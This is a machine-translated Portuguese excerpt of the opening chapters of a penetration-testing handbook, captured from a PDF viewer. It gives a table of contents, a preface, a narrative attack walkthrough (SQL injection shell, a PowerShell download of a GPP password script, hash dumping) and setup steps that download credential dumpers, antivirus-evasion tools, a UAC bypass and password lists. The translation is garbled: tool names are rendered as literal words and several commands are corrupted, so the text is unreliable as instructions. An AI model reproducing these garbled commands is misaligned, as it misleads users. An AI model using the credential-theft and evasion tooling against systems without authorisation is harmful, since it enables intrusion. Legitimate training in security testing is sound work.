The Hacker Playbook

Prévia do material em texto

17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 1/115
PLAYBOOKHACKERA
Guia Prático Para
Os testes de penetração
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 2/115
Copyright © 2014 por seguro Planeta LLC. Todos os direitos reservados. Exceto conforme permitido pela United States Copyright Act, de 1976, nenhuma parte
desta publicação pode ser reproduzida ou distribuída de qualquer forma ou por qualquer meio, ou armazenada em uma base de dados ou sistema de recuperação, sem
a prévia permissão por escrito do autor.
ISBN: 1494932636
ISBN 13: 9781494932633
Biblioteca do Congresso de controlo do número: 2014900431
CreateSpace plataforma de publicação Independente
North Charleston, Carolina do Sul
MHID:
design de livros e produção de Peter Kim, Secure Planeta LLC
design da capa por Dit Vannouvong
Publisher: Fixe Planeta LLC
Publicação: 01 de janeiro de 2014
Prefácio
Introdução
Informações adicionais sobre este Livro
aviso Legal
Pregame ­ O Setup
Configurando um Box Testing Penetração
Equipamento:
requisitos de hardware básicos são:
hardware opcional discutido mais tarde dentro do livro:
Software comercial
Kali Linux (http://www.kali.org/)
Lista alta ferramentas de nível adicional para Kali:
Configurando Kali:
Uma vez que seu Kali VM está instalado e funcionando:
Janelas host VM
ferramentas de alto nível lista Além do Windows:
Configurando o Windows
Resumo
Antes da Snap ­ Digitalização da Rede
Digitalização externa
Descoberta passiva
Descubra Scripts (previamente Scripts BackTrack) (Kali Linux)
Como executar passiva Descoberta
Usando listas comprometidos para localizar endereços de e­mail e credenciais
/ Descoberta Ativo Externo Interno
O Processo de Digitalização em Rede:
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 3/115
Rede de Vulnerabilidade (Nexpose / Nessus)Captura de tela ­ Peeping Tom
Web Application Scanning
O processo para digitalizar Web:
Web Application Scanning
Configurar o Proxy de rede e navegador
aranha Aplicação
Descubra conteúdo
Executando o Scanner Ativo
Resumo
A unidade ­ Apreciação Scanner Explorando
Metasploit (http://www.metasploit.com) (Windows / Linux Kali)
Passos básicos Ao configurar ataques remotos Metasploit:
Pesquisando através Metasploit (usando o bom e velho MS08­067 vulnerabilidade):
Scripts
Exemplo WarFTP
Resumo
O Lance ­ Manual Descobertas Web Application
Teste de penetração de aplicativos da Web
SQL Injeções
SqlMap (http://sqlmap.org/) (Kali Linux)
Sqlninja (http://sqlninja.sourceforge.net/) (Kali Linux)
executando Sqlninja
Cross­Site Scripting (XSS)
Beef Exploitation Framework (http://beefproject.com/) (Kali Linux)
Cross­Site Scripting Obfuscation:
crowd sourcing
Folha OWASP fraude
Cross­Site Request Forgery (CSRF)
Usando arroto de Ataques de replay CSRF
tokens de sessão
Fuzzing adicional / validação de entrada
Funcional / Teste de lógica de negócios
Conclusão
The Pass Lateral ­ se movendo através da rede
Na Rede sem credenciais:
Responder.py (https://github.com/SpiderLabs/Responder) (Kali Linux)
Com as credenciais de domínio (não­administrador):
Preferências de Diretiva de Grupo:
Puxando credenciais criptografadas
WCE ­ Editor de Credencial do Windows
(Http://www.ampliasecurity.com/research/wcefaq.html) (Windows)
Mimikatz (http://blog.gentilkiwi.com/mimikatz)(Windows)
Dicas pós Exploração
Pós Exploração Lista de Room362.com:
Com Qualquer conta administrativa ou de administração de domínio local:
Possuir rede com credenciais e PSExec:
PSExec e Veil (Kali Linux)
Psexec Comandos em Múltiplas IPs (Kali Linux)
Atacar o controlador de domínio:
SMBExec (https://github.com/brav0hax/smbexec) (Kali Linux)
Pós Exploração com PowerSploit (https://github.com/mattifestation/PowerSploit)
(Janelas)
comandos:
Pós Exploração com o PowerShell (https://code.google.com/p/nishang/) (Windows)
ARP (Address Resolution Protocol) Envenenamento
IPv4
Caim e Abel (Windows)
Ettercap (Kali Linux)
IPv6
A ferramenta é capaz de fazer ataques diferentes, tais como:
Passos Após ARP Spoofing:
SideJacking:
Hamster / Ferret (Kali Linux)
Firesheep
Redirecionamento de DNS:
sslstrip:
Comandos de Kali:
Proxy entre os hosts
Conclusão
The Screen ­ Engenharia Social
Domínios Doppelganger
Ataque SMTP
Ataque SSH
Extrair OpenSSH:
spear phishing
Metasploit Pro ­ Módulo de Phishing
Engenharia Social Toolkit (Kali Linux)
credencial Harvester
Para gerar uma página falsa, vá até o seguinte:
Usando SET JAVA Ataque
O envio de campanhas maciças Spear phishing
Engenharia Social com o Microsoft Excel
Conclusão
Os pontapé em jogo ­ ataques que requerem acesso físico
explorando sem fio
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 4/115
Passivo ­ Identificação e ReconhecimentoAtaques ativos
WEP ­ Wired Equivalent Privacy
Como quebrar WEP em Kali:
WPAv2 WPS (Wi­Fi Protected Setup) Os ataques
WPA Empresa ­ Falso Ataque Radius
Configurar um servidor Radius
Karmetasploit
Físico
Clonagem de cartão:
Pentesting Drop Box
U2 ODROID:
Engenharia Social física
Conclusão
O quarterback sneak ­ Fugindo AV
fugindo AV
Escondendo WCE de AV (Windows)
pitão
Python Shell
Python Keylogger
Exemplo Veil (Kali Linux)
SMBExec (Kali Linux)
Conclusão
Equipes especiais ­ Cracking, explora Tricks
Quebra de senha
John the Ripper (JTR):
Cracking hashes MD5
oclHashcat:
Cracking WPAv2
Cracking NTLMv2
Cracking Smarter
Searching vulnerabilidade
Searchsploit (Kali Linux)
BugTraq
Exploit­DB
Consultando Metasploit
Dicas e truques
Scripts RC dentro Metasploit
UAC Bypass
Web Filtering Bypass para seus domínios
Windows XP ­ Antiga escola truque FTP
Escondendo seus arquivos (Windows)
Mantendo Aqueles arquivos ocultos (Windows)
Janelas 7/8 Carregamento de arquivos para o host
Pós Análise Game ­ Relatórios
relatórios
Lista de meus melhores práticas e conceitos para reportar:
Educação continuada
Grandes conferências:
Os contras que eu recomendo a partir de minha própria experiência pessoal:
Cursos de Formação:
livros
Reading técnico:
Fun Segurança Leitura relacionada:
Frameworks de testes de penetração vulneráveis
Capture the Flag (CTF)
Manter em dia
RSS Lista de alimentação / Site:
Listas de e­mail:
Listas do Twitter:
Notas finais
Agradecimentos especiais
Eu não comecei um dia para pensar que eu ia escrever um livro sobre testes de penetração, mas eu meio que caiu dentro dele.
O que aconteceu foi que eu comecei a tomar notas a partir de testes de penetração, conferências, artigos de segurança,
pesquisa e experiências de vida. Como minhas notas cresceu e cresceu, descobri cada vez melhores maneiras de realizar
tarefas repetitivas e eu comecei a entender o que funcionou eo que não funcionou.
Quando comecei a ensinar, falar em conferências, e envolver­se na comunidade de segurança, eu senti que o
indústria poderia beneficiar de minhas lições aprendidas. Este livro é uma coleção de apenas isso. um importante
coisa que eu quero salientar é que eu não sou um escritor profissional, mas escreveu este livro como um hobby. Vocês
pode ter seus próprios preferidos ferramentas, técnicas e táticas que você utiliza, mas isso é o que torna este
campo grande. Muitas vezes há muitas respostas diferentes à mesma pergunta e eu convidamos você a explorar
17/02/2016C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 5/115
o Shopping. Eu não estará dando uma explicação passo­a­passo de cada tipo de ataque; por isso é o seu trabalho para
continuamente fazer a pesquisa, tente de forma diferente métodos, e ver o que funciona para você.
Este livro assume que você tem algum conhecimento de ferramentas de segurança comuns, ter utilizado um pouco
Metasploit, e manter­se um pouco com a indústria de segurança. Você não tem que ser um testador de penetração
para tirar o máximo proveito do livro; mas ajuda se a sua paixão é para a segurança.
Meu objetivo ao escrever este livro é para criar uma abordagem simples e prático à penetração
teste. Há muitos livros de segurança que discutem a cada tipo de ferramenta e cada tipo de vulnerabilidade,
onde apenas pequenas porções dos ataques parece ser relevante para o dispositivo de teste de penetração média. Minhas
esperança é que este livro vai ajudá­lo a evoluir o seu conhecimento de segurança e entender melhor como você
precisa para proteger seu próprio ambiente.
Ao longo do livro, eu vou estar indo em técnicas e processos que eu sinto são mundo real e parte de uma
engajamento de penetração típica. Você não vai ser sempre capaz de usar estas técnicas exatamente como mostrado,
mas eles devem ajudar a fornecer uma boa base para onde você deve começar.
Vou concluir com alguns conselhos que eu encontrei para ser útil. Para tornar­se uma maior segurança
profissional, algumas das coisas mais importantes a fazer são:
1. Aprender, estudar e entender as vulnerabilidades e fraquezas de segurança comuns
2. Prática exploração e garantir vulnerabilidades em ambientes controlados
3. Realizar testes em ambientes reais
4. Teach e apresentar à comunidade de segurança
Esses ponteiros representam um ciclo de vida contínua, o que irá ajudá­lo a evoluir na sua maturidade técnica.
Mais uma vez obrigado por ler este livro e eu espero que você se divirta tanto lê­lo como eu tinha de escrevê­lo.
Debruçado sobre o seu teclado em seu quarto mal iluminado, frustrado, possivelmente em um demasiados energia
bebidas, você verificar o seu telefone. Como você apertar os olhos contra o brilho da tela LCD brilhante, você quase não fazer
o tempo para estar 3:00 "Grande", você pensa consigo mesmo. Você tem mais de 5 horas antes do seu exame é
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 6/115
mais e você ainda não encontrou uma única exploração ou vulnerabilidade crítica. Seus scans não foram frutíferos e
ninguém vai aceitar um relatório com um monte de questões de biscoito Bandeira seguros.
Você precisa que Hail Mary passar, então você pegar o Hacker Playbook e aberto para a seção chamada
"O Lance ­ Apreciação manual de Web Application". A digitalização através, você vê que você perdeu
testando os cookies para ataques de injeção SQL. Você pensa: "Isso é algo que um scanner web simples
iria perder. "Você lançar SqlMap usando o interruptor de cookie e executá­lo. Um par de minutos depois,
sua tela começa a oscilar violentamente e pára em:
sistema operacional de servidor Web: Windows 2008
web tecnologia de aplicação: ASP.net, Microsoft IIS 7.5
para trás e DBMS: Microsoft SQL Server 2008
Perfeito. Você usa SqlMap a cair em um shell de comando, mas, infelizmente, perceber que você não tem
privilégios administrativos. "Qual seria o próximo passo lógico ...? Eu gostaria de ter algum pós
truques de exploração na manga ", você pensa consigo mesmo. Então você lembre­se que este livro poderia ajudar
com isso. Você abre a seção "O Lateral Pass ­ Movendo­se através da rede" e ler e
baixa. Há tantas opções diferentes aqui, mas vamos ver se esta máquina está ligado ao domínio
e se eles usaram Preferências de Diretiva de Grupo para definir administradores locais.
Aproveitando o comando IEX Power Shell, você forçar o servidor para baixar Poder Sploit de
GPP roteiro, executá­lo e armazenar os resultados em um arquivo. Parece que funcionou sem disparar Anti­
Vírus! Você lê o conteúdo do arquivo que o script exportados e eis que, o local de
senha administrativa.
O resto é história ... você gerar um escudo Meterpreter com os privilégios de administrador, pivô através desse acolhimento,
e usar SMBexec para puxar todos os hashes de usuário do controlador de domínio.
Claro, tudo isso foi um exemplo muito rápido e de alto nível, mas é assim que eu tentei para o layout do livro.
Há 10 seções diferentes para este livro, estabelecidos como um playbook futebol. As 10 seções são:
Pregame: Isto é tudo sobre como configurar suas máquinas atacando e as ferramentas que vai usar todo
o livro.
Antes da Snap: Antes de executar quaisquer peças, você precisa analisar o seu ambiente e entender
o que você está acima de encontro. Vamos mergulhar na descoberta e digitalização inteligente.
O Drive: Tomar essas vulnerabilidades que você identificados a partir dos scans, e explorando os
sistemas. Isto é onde nós chegar em nossas mãos um pouco sujo e começar a explorar caixas.
A Resistência: Às vezes você precisa ser criativo e procurar o alvo aberto. Vamos dar uma olhada
como encontrar e explorar resultados de aplicações Web manuais.
The Pass Lateral ­ Depois de ter comprometido um sistema, como mover­se lateralmente através da
rede.
The Screen ­ Um jogo normalmente usado para enganar o inimigo. Este capítulo irá explicar alguns sociais
táticas de engenharia.
O pontapé em jogo ­ Um deliberadamente curto chute que requer curta distância. Aqui vou descrever
ataques que requerem acesso físico.
O quarterback sneak ­ Quando você só precisa de um par de jardas uma espreitadela quarterback é perfeito.
Às vezes você ficar preso com antivírus (AV); este capítulo descreve como obter mais os pequenos
obstáculos por fugir AV.
Equipes especiais ­ senhas rachaduras, exploits, e alguns truques
Pós­Game Analysis ­ Relatórios suas descobertas
Antes de escavar em como atacar redes diferentes, pivot por meio de controles de segurança, e evitar AV, I
quer levá­lo para a mentalidade certa. Imagine que você tenha sido contratado como o testador de penetração para testar a
segurança geral de uma empresa da Fortune 500. Onde começar? O que você está a sua segurança de linha de base
testes? Como você fornecer testes consistente para todos os seus clientes e quando fazê­lo desviar­se de que
linha? Isto é como eu estou indo para entregar as mensagens deste livro.
É importante notar que este livro representa apenas os meus pensamentos e experiências pessoais. Este livro
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 7/115
não tem nada a ver com qualquer do meu passado ou empregadores atuais ou qualquer coisa que eu estou envolvido com o exterior
este livro. Se existem tópicos ou idéias que tenho deturpados ou ter esquecido de dar crédito onde
for caso disso, por favor me avise e eu vou fazer atualizações no site para o livro:
www.thehackerplaybook.com.
Uma recomendação importante que eu tenho quando você está aprendendo: pegue as ferramentas e tentar recriá­los
em outra linguagem de script. Eu geralmente gosto de usar python para recriar ferramentas comuns e nova
exploits. Isso se torna muito importante, porque você vai evitar tornar­se ferramenta dependente, e você
entender melhor por que a vulnerabilidade é uma vulnerabilidade.
Finalmente, quero reiterar que a prática leva à perfeição. A regra Eu sempre ouvi é que leva
10.000 horas para dominar alguma coisa. No entanto, eu não acredito que há sempre um momento em que qualquer pessoa pode
completamente testes depenetração mestre, mas eu vou dizer que, com o suficiente testes de penetração prática pode
se uma segunda natureza.
Como outro estado livros hacker ético, não testar sistemas que não possuem ou não tem permissão
para digitalizar ou ataque. Lembre­se do caso em que um homem se juntou a um ataque anônimo para 1 minuto e foi
multado $ 183.000 1 ? Certifique­se de tudo o que você tem sido escrito para baixo e que você tem total aprovação
das empresas, ISPs, compartilhada provedor de hospedagem, ou qualquer outra pessoa que possa ser afectada durante um teste.
Por favor, certifique­se também testar todos os seus scans e ataques em um ambiente de teste antes de tentar qualquer
ataques em qualquer ambiente de produção. Há sempre uma chance de que você pode tomar para baixo de sistemas e
causar grandes problemas com qualquer tipo de teste.
Finalmente, antes de começar este livro não contém qualquer tipo de ataque nem conhecimento de
o livro representam sempre o melhor ou o método mais eficiente possível. Estas são as técnicas que tenho
apanhados no e descobriram que funcionou bem. Se você encontrar quaisquer erros óbvios ou ter uma melhor forma de
realização de um teste, por favor, sinta­se livre para me informar.
Este capítulo vai mergulhar de cabeça em como você pode querer configurar os seus sistemas de ataque eo
metodologia que eu uso. Um dos aspectos mais importantes do teste está a ter um processo repetitivo. Para
fazer isso, você precisa ter um sistema padrão de linha de base, ferramentas e processos. Eu vou entrar em como eu
configurar minhas plataformas de teste e processo de instalação de todas as ferramentas adicionais que serão usados
dentro deste livro. Se você seguir os passos abaixo, você deve ser capaz de executar a maior parte do
exemplos e manifestações, que eu forneço, nos capítulos seguintes. Vamos começar a cabeça na
jogo e prepará­lo para a batalha.
Para todos os meus próprios testes de penetração, eu gosto de ter sempre duas caixas diferentes configurado (a do Windows
caixa e uma caixa de Linux). Lembre­se que se você está confortável com uma plataforma de base diferente, sinta­se livre
para construir o seu próprio. O tema é realmente como criar um sistema de linha de base, que eu sei que vai ser
consistente ao longo de meus testes. Depois de configurar meus anfitriões, eu vou instantâneo da máquina virtual no
limpo e configurado Estado. Dessa forma, para qualquer futuro testa tudo que eu preciso fazer é voltar para a linha de base
imagem, remendo, ferramentas de atualização e adicione quaisquer ferramentas adicionais que eu preciso. Confie em mim, esta tática é um salva­vidas. Eu
não pode contar o número de testes de penetração no passado onde eu passei tempo demais a criação de um
ferramenta que eu deveria ter já instalado.
Antes de podermos começar a baixar máquinas virtuais (VM) e instalação de ferramentas, é preciso certificar­se de
temos um computador que é capaz de executar tudo. Estes são apenas recomendações para se
seu próprio julgamento sobre eles. Não importa se você rodar o Linux, Windows ou OS X como sua linha de base
sistema, apenas certifique­se de manter esse sistema de linha de base limpa de infecção por malware.
requisitos de hardware básicos são:
Alguns desses requisitos pode ser um pouco alto, mas múltiplas máquinas virtuais em execução pode drenar seus recursos
rapidamente.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 8/115
Laptop com pelo menos 8 GB de RAM
500 GB de espaço no disco rígido e Estado Sólido de preferência
i7 processador Intel Quad Core
As estações de trabalho VMware / Fusão / Player ou o Virtual Box
placa wireless USB externo ­ Eu uso atualmente o Alfa AWUS051NH
hardware opcional discutido mais tarde dentro do livro:
cartão GPU para quebra de senha. Isto terá de ser instalado em uma estação de trabalho.
Alguns CDs ou pen drives (por engenharia social)
Dropbox ­ ODROID U2
Eu recomendo se você estiver indo para entrar neste campo, que você olhar para a compra de licenças para
o seguinte ou ter sua empresa fazê­lo, uma vez que pode ser caro. Não é necessário comprar estes
ferramentas, mas eles vão certamente fazer a sua vida muito mais fácil. Isto é especialmente verdadeiro para a teia
scanners de inscrição abaixo, que pode ser extremamente caro. Eu não listei todos os diferentes tipos
de scanners, mas apenas as que eu usei e teve sucesso com.
Se você está procurando comparações ferramenta que você deve ler o white paper sobre HackMiami Web
Scanner Aplicação 2013 PwnOff (http://hackmiami.org/whitepapers/HackMiami2013PwnOff.pdf)
e um Mais velho artigo de sectooladdict.blogspot.com
(Http://sectooladdict.blogspot.com/2012/07/2012­web­application­scanner­benchmark.html).
Nexpose / Nessus Vulnerability Scanner (Altamente Recomendado)
o Nexpose: http://www.rapid7.com/products/nexpose
o Nessus: http://www.tenable.com/products/nessus
o Ambas as ferramentas funcionam bem, mas para uma licença individual que eu vi diferenças significativas de custos
entre Nexpose e Nessus. Normalmente Nessus será muito mais barato para o teste individual.
Estes são os dois indústria scanners de vulnerabilidade padrão.
Arroto Suite http://portswigger.net/burp/­ Scanner Aplicação Web e Manual Web App Testing
(Altamente recomendado)
o Este é um deve comprar. Esta ferramenta tem muitas vantagens diferentes e é mantido de forma activa. Acredito
o custo é de cerca de US $ 300. Se você não puder pagar arroto, você pode obter do scanner OWASPs ZAP
(https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project), que tem um monte de
as mesmas características e também é mantida activa. Todos os exemplos neste livro vai usar
Arroto Suite Pro desde que eu encontrei­o para ser uma ferramenta extremamente eficaz.
Automatizados Scanners aplicação web (Eu tive sucesso decente com os dois seguintes. Encontre o que
trabalha em seu orçamento). Quero declarar que este livro não vai falar sobre qualquer um destes web app
scanners, uma vez que são ponto bastante simples e atirar ferramentas, mas eu recomendo­los para
testes de aplicação web profissional ou se você fornecer avaliações da empresa de web regulares.
o IBM AppScan: http://www­03.ibm.com/software/products/en/appscan
o HP Rede Inspecione: http://www8.hp.com/us/en/software­solutions/software.html?
compURI = 1341991
(Http://www.kali.org/)
Kali é uma distribuição Linux penetração (ou "distro", para abreviar), que contém uma grande quantidade do comum
ferramentas utilizadas para testes de penetração. Isso provavelmente é visto como o padrão agora na segurança
comunidade e muitas pessoas estão a construir fora deste quadro. Concordo que Kali tem um monte de
ferramentas que tinha Eu normalmente uso, mas eu adicionei algumas ferramentas do meu próprio. Alguns dos binários como o Windows
Editor de Credencial (WCE) pode já estar on a Kali distro, mas eu gostaria de fazer a certeza de que eu sou
download da versão mais recente. Tento também certificar­se de manter os binários I modificar para fugir
AV em uma pasta separada para que eles não recebem substituído.
Eu também quero, note que há um monte de outras boas distros diferentes lá fora. Uma distro que eu faria
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 9/115
recomendamos que você confira se chama pentoo (http://www.pentoo.ch/). Vamos começar a mergulhar no KaliDistro.
Lista alta ferramentas de nível adicional para Kali:
Descubra Scripts (formalmente Backtrack Scripts)
SMBexec
Véu
WCE
Mimikatz
Password Lists
Arrotar
PeepingTom
gnmap.pl
PowerSploit
Responder
Carne
Responder
Raposa de fogo
o Web DeveloperAdd­on
o Dados Tamper
o Foxy Proxy
o User Agent Switcher
Configurando Kali:
Há muitas maneiras diferentes você pode configurar o seu anfitrião atacante, mas eu quero que você seja capaz de imitar
todos os exemplos neste livro. Antes de ir, você deve tentar configurar o host com o
as seguintes configurações. Lembre­se que as ferramentas mudam periodicamente e que você pode precisar fazer
pequenos ajustes para essas configurações ou configurações.
Você pode baixar o distro Kali de http://www.kali.org/downloads/. Eu recomendo que você
baixar a imagem VMware (http://www.offensive­security.com/kali­llnux­vmware­arm­image­
download /) e baixar VMPlayer / VirtualBox. Ele é gz compactado e tar arquivados, de modo tornar a certeza de
extraí­los primeiro e carregar o arquivo VMX.
Uma vez que seu Kali VM está instalado e funcionando:
1. Entrar com a raiz nome de usuário ea senha padrão toor
2. Abra um Terminal
3. Alterar senha
uma. Sempre importante para mudar a senha de root, especialmente se você permitir que os serviços de SSH.
b. passwd
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 10/115
4. Atualização de Imagem com o comando:
uma. apt­get update
b. apt­get dist­upgrade
5. banco de dados de configuração para Metasploit
uma. Este é configurar Metasploit para usar um banco de dados para resultados armazenados e indexação do
módulos.
b. início postgresql serviço
c. serviço de início Metasploit
6. * opcional para Metasploit ­ Ativar registro
uma. Eu mantenho isso como um opcional, já que os logs ficar muito grande, mas você tem a capacidade de registrar cada
de comando e resultado de Command Line Interface do Metasploit (CLI). Isto torna­se
muito útil para ataque / consultas a granel ou se o seu cliente exige que estes arquivos.
b. echo "spool / root / msf_console.log"> /root/.msf4/msfconsole.rc
c. Logs serão armazenados em / root / msf_console.log
7. Instale Descubra Scripts (originalmente chamada Rota inversa­scripts)
uma. Discover é usado para Passive Contagem
b. cd / opt /
c. git clone https://github.com/leebaird/discover.git
d. cd descobrir /
e. ./setup.sh
8. Instale Smbexec
uma. Smbexec será usado para pegar hashes fora do controlador de domínio e conchas reversa
b. cd / opt /
c. git clone https://github.com/brav0hax/smbexec.git
d. cd smbexec
e. ./install.sh
Eu. Escolha número 1
f. Instalar para / opt
g. ./install.sh
Eu. Escolha o número 4
9. Instale Veil
uma. Véu será usado para criar python com base Meterpreter executável
b. cd / opt /
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 11/115
c. git clone https://github.com/veil­evasion/Veil.git
d. cd ./Veil/setup
e. ./setup.sh
10. Baixar WCE
uma. Credenciais do Windows Editor (WCE) será usado para puxar senhas de memória
b. cd ~ / Desktop
c. wget http://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip
d. unzip ­d ./wce wce_v1_41beta_universal.zip
11. Baixar Mimikatz
uma. Mimikatz vai ser utilizado para puxar senhas de memória
b. cd ~ / Desktop
c. wget http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
d. unzip ­d./mimikatz mimikatz_trunk.zip
12. Listas senha Saving personalizadas
uma. listas de senhas para rachar hashes
b. cd ~ / Desktop
c. mkdir ./password_list && cd ./password_list
d. Baixar lista de senhas grande via browser e salvar a ./password_list:
https://mega.co.nz/#!3VZiEJ4L!TitrTiiwygI2I_7V2bRWBH6rOqlcJ14tSjss2qR5dqo
e. gzip ­d crackstation­humana­only.txt.gz
f. wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
g. bzip2 ­d rockyou.txt.bz2
13. cd ~ / Desktop
14. Download: . Http://portswigger.net/burp/proxy.html Eu recomendo que você comprar o
versão profissional. É bem vale o preço de US $ 300 nele.
15. Configurando Peepingtom
uma. Peepingtom será usado para tirar instantâneos de páginas da web
b. cd / opt /
c. git clone https://bitbucket.org/LaNMaSteR53/peepingtom.git
d. cd ./peepingtom/
e. wget
https://gist.github.com/nopslider/5984316/raw/423b02c53d225fe8dfb4e2df9a20bc800cc78
f. wget https://phantomjs.googlecode.com/files/phantomjs1.9.2­linux­i686.tar.bz2
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 12/115
g. tar xvjf PhantomJS­1.9.2­linux­i686.tar.bz2
h. ./phantomjs­1.9.2­linux­i686/bin/phantomjs PB.
16. Adição de roteiro Nmap
uma. O banner­plus.nse será usado para a digitalização mais rápida e mais inteligente de identificação
b. cd / usr / share / nmap / scripts /
c. wget https://raw.github.com/hdm/scan­tools/master/nse/banner­plus.nse
PowerSploit 17. Instalando
uma. PowerSploit são scripts do PowerShell para a exploração de pós
b. cd / opt /
c. git clone https://github.com/mattifestation/PowerSploit.git
d. cd PowerSploit
e. wget https://raw.github.com/obscuresec/random/master/StartListener.py
f. wget https://raw.github.com/darkoperator/powershell_scripts/master/ps_encoder.py
Responder 18. Instalação
uma. Responder será utilizado para obter hashes NTLM de desafio / resposta
b. cd / opt /
c. git clone https://github.com/SpiderLabs/Responder.git
19. Instalação de Engenharia Social Toolkit (não precisa re­instalar em Kali) (SET)
uma. SET será usado para as campanhas de engenharia social
b. cd / opt /
c. git clone https://github.com/trustedsec/social­engineer­toolkit/set/
d. conjunto cd
e. ./setup.py instalar
20. Instale bypassuac
uma. Será usado para contornar UAC nas seções pós exploração
b. cd / opt /
c. wget http://www.secmaniac.com/files/bypassuac.zip
d. bypassuac.zip descompactação
e. cp bypassuac / bypassuac.rb / opt / metasploit / apps / pro / msf3 / scripts / meterpreter /
f. mv bypassuac / UAC // opt / metasploit / apps / pro / msf3 / data / exploits /
Carne bovina 21. Instalação
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 13/115
uma. Beef será usado como um quadro ataque de script cross­site
b. apt­get install carne de bovino de XSS
22. Instalação de fuzzing Lists (SecLists)
uma. Estes são scripts para usar com Burp aos parâmetros de fuzz
b. cd / opt /
c. git clone https://github.com/danielmiessler/SecLists.git
23. Instalação de Complementos do Firefox
uma. Web Developer Add­on: https://addons.mozilla.org/en­US/firefox/addon/web­developer/
b. Tamper Data: https://addons.mozilla.org/en­US/firefox/addon/tamper­data/
c. Foxy Proxy: https://addons.mozilla.org/en­US/firefox/addon/foxyproxy­standard/
d. User Agent Switcher: https://addons.mozilla.org/en­US/firefox/addon/user­agent­switcher/
Eu recomendo que você também configurar um Windows 7 Virtual Machine. Isso é porque eu estive em
muitos testes, onde uma aplicação será exigem o Internet Explorer ou uma ferramenta como Cain e Abel só irá
trabalhar sobre um sistema operativo. Lembre­se de todos os ataques PowerShell vai exigir que você execute o
comandos em seus hosts do Windows. O ponto que eu quero fazer é estar sempre preparado e que você vai
salvar um monte de tempo e problemas com vários sistemas operacionais disponíveis.
ferramentas de alto nível lista Além do Windows:
HxD (Hex Editor)
Iludir (usado para Evasão AV)
Hyperion (usado para Evasão AV)
Metasploit
Nexpose / Nessus
Nmap
oclHashcat
mal Foca
Caim e Abel
Arrotar Suite Pro
Nishang
PowerSploit
Firefox(Add­ons)
o Web Developer Add­on
o Dados Tamper
o Foxy Proxy
o User Agent Switcher
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 14/115
Configurando o Windows
A criação de uma plataforma de testes comuns do Windows deve ser o de ajudar a complementar o seu anfitrião Kali Linux.
Lembre­se de mudar seus nomes de host, desativar o NetBIOS se você não precisa dele, e endurecer essas caixas como
tanto quanto você pode. A última coisa que você quer é obter possuído durante um teste.
Não há nada de especial que eu configuração no Windows, mas geralmente eu vou instalar o seguinte.
1. HxD http://mh­nexus.de/en/hxd/
2. Iludir https://www.securepla.net/antivirus­now­you­see­me­now­you­dont/
3. Hyperion http://www.nullsecurity.net/tools/binary.html
uma. Download / instalar um Windows Compiler http://sourceforge.net/projects/mingw/
b. Execute "make" na pasta Hyperion extraído e você deve ter o binário.
4. Faça o download e instalar o Metasploit http://www.Metasploit.com/
5. Faça o download e instale o Nessus ou Nexpose
uma. Se você está comprando seu próprio software, você provavelmente deve olhar para Nessus, pois é muito
mais barato, mas ambos funcionam bem
6. Faça o download e instalar o nmap http://nmap.org/download.html
7. Baixe e instale oclHashcat http://hashcat.net/oclhashcat/#downloadlatest
8. Faça o download e instale o mal foca http://www.informatica64.com/evilfoca/
9. Faça o download e instalar o Cain e Abel http://www.oxid.it/cain.html
10. BURP http://portswigger.net/burp/download.html
11. Faça o download e extrair Nishang: https://code.google.com/p/nishang/downloads/list
12. Baixar e extrair PowerSploit: https://github.com/mat­
tifestation / PowerSploit / archive / master.zip
13. Instalação Complementos do Firefox
